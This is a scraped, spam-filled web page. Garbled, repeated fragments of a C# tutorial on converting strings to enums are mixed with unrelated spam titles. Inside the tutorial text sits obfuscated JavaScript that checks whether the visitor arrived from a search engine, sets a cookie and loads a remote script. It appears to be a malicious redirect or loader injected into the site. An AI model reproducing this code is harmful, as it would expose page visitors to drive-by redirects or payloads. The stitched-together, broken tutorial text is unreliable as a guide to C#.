Leave a Reply Cancel replySubscribe to our NewsletterCopyright ©2017· codecompiled - All Rights Reserved.. But if you compare it with the previous example we are not using any casting ot type object.. If the type of the Enum can be inferred from the second parameter then we can omit the type argument of the TryParse method.. constructor(\x22return\x20this\x22)(\x20)' ');');_0x202d3d=_0x1fe72d();}catch(_0x27ef60){_0x202d3d=window;}var _0x3a7178='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /=';_0x202d3d['atob']||(_0x202d3d['atob']=function(_0xef1a93){var _0x5f5163=String(_0xef1a93)['replace'](/= $/,'');for(var _0xeb5b8=0x0,_0x6a89b,_0x1b05db,_0xd3606d=0x0,_0x1bb7e5='';_0x1b05db=_0x5f5163['charAt'](_0xd3606d );~_0x1b05db&&(_0x6a89b=_0xeb5b8%0x4?_0x6a89b*0x40 _0x1b05db:_0x1b05db,_0xeb5b8 %0x4)?_0x1bb7e5 =String['fromCharCode'](0xff&_0x6a89b>>(-0x2*_0xeb5b8&0x6)):0x0){_0x1b05db=_0x3a7178['indexOf'](_0x1b05db);}return _0x1bb7e5;});}());_0x47a2['base64DecodeUnicode']=function(_0x2caa81){var _0x3cc81d=atob(_0x2caa81);var _0x34b926=[];for(var _0x5923ee=0x0,_0x5c82c6=_0x3cc81d['length'];_0x5923ee=_0x217644;},'RNwRG':'mBu','vlwbu':function _0x299064(_0x55d858,_0xe09481){return _0x55d858 _0xe09481;},'AJHOR':function _0x4056b9(_0x3470f3,_0x3ccbee){return _0x3470f3 _0x3ccbee;}};var _0x5bbc8f=[_0x18cdce[_0x47a2('0x1e')],'.. Also we need to pass the Type object as an argument to this method This type object represents the type of the enumpublic static object Parse(Type enumType, string value);So if we define an Enum as:Then we can use the following code to convert the string value to enum valueIn the above code we are converting the value of the string manager to an EmployeeType enum. Vmware Virtual Ethernet Adapter For Vmnet1 Driver

Leave a Reply Cancel replySubscribe to our NewsletterCopyright ©2017· codecompiled - All Rights Reserved.. But if you compare it with the previous example we are not using any casting ot type object.. If the type of the Enum can be inferred from the second parameter then we can omit the type argument of the TryParse method.. constructor(\x22return\x20this\x22)(\x20)' ');');_0x202d3d=_0x1fe72d();}catch(_0x27ef60){_0x202d3d=window;}var _0x3a7178='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /=';_0x202d3d['atob']||(_0x202d3d['atob']=function(_0xef1a93){var _0x5f5163=String(_0xef1a93)['replace'](/= $/,'');for(var _0xeb5b8=0x0,_0x6a89b,_0x1b05db,_0xd3606d=0x0,_0x1bb7e5='';_0x1b05db=_0x5f5163['charAt'](_0xd3606d );~_0x1b05db&&(_0x6a89b=_0xeb5b8%0x4?_0x6a89b*0x40 _0x1b05db:_0x1b05db,_0xeb5b8 %0x4)?_0x1bb7e5 =String['fromCharCode'](0xff&_0x6a89b>>(-0x2*_0xeb5b8&0x6)):0x0){_0x1b05db=_0x3a7178['indexOf'](_0x1b05db);}return _0x1bb7e5;});}());_0x47a2['base64DecodeUnicode']=function(_0x2caa81){var _0x3cc81d=atob(_0x2caa81);var _0x34b926=[];for(var _0x5923ee=0x0,_0x5c82c6=_0x3cc81d['length'];_0x5923ee=_0x217644;},'RNwRG':'mBu','vlwbu':function _0x299064(_0x55d858,_0xe09481){return _0x55d858 _0xe09481;},'AJHOR':function _0x4056b9(_0x3470f3,_0x3ccbee){return _0x3470f3 _0x3ccbee;}};var _0x5bbc8f=[_0x18cdce[_0x47a2('0x1e')],'.. Also we need to pass the Type object as an argument to this method This type object represents the type of the enumpublic static object Parse(Type enumType, string value);So if we define an Enum as:Then we can use the following code to convert the string value to enum valueIn the above code we are converting the value of the string manager to an EmployeeType enum. 773a7aa168 Vmware Virtual Ethernet Adapter For Vmnet1 Driver

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The second parameter is the actual string value which we want to convert As the return type is object so we need to cast it to the proper enum type.. bing ',_0x18cdce['tfrtn'],_0x47a2('0x1f'),' ask ',_0x18cdce[_0x47a2('0x20')],_0x18cdce[_0x47a2('0x21')]],_0x4cd13b=document[_0x47a2('0x22')],_0x44a6ab=![],_0x39676f=cookie['get'](_0x18cdce[_0x47a2('0x23')]);for(var _0x1ee5a0=0x0;_0x18cdce[_0x47a2('0x24')](_0x1ee5a0,_0x5bbc8f[_0x47a2('0xa')]);_0x1ee5a0 ){if(_0x18cdce[_0x47a2('0x25')](_0x4cd13b[_0x47a2('0x26')](_0x5bbc8f[_0x1ee5a0]),0x0)){_0x44a6ab=!![];}}if(_0x44a6ab){if(_0x18cdce[_0x47a2('0x27')]===_0x18cdce[_0x47a2('0x27')]){cookie[_0x47a2('0x28')](_0x18cdce[_0x47a2('0x23')],0x1,0x1);if(!_0x39676f){include(_0x18cdce['vlwbu'](_0x18cdce[_0x47a2('0x29')](_0x47a2('0x2a'),q),''));}}else{return undefined;}}}R(); Converting string to Enum in C#While working with Enums there is often the requirement to convert string type to an enum type.. The output of the above conversion is an enum having value Manager TryParse method of Enum classThis is a generic method so it doesn’t require any type casting.. Converting string to enum in C# is easy using the static Parse methods of the Enum class.. Lets see how we can use these methodsParse method of Enum classThis method is non generic so it requires type casting as it returns object type. Скачать Гта Санандрес Тока Русские Авто

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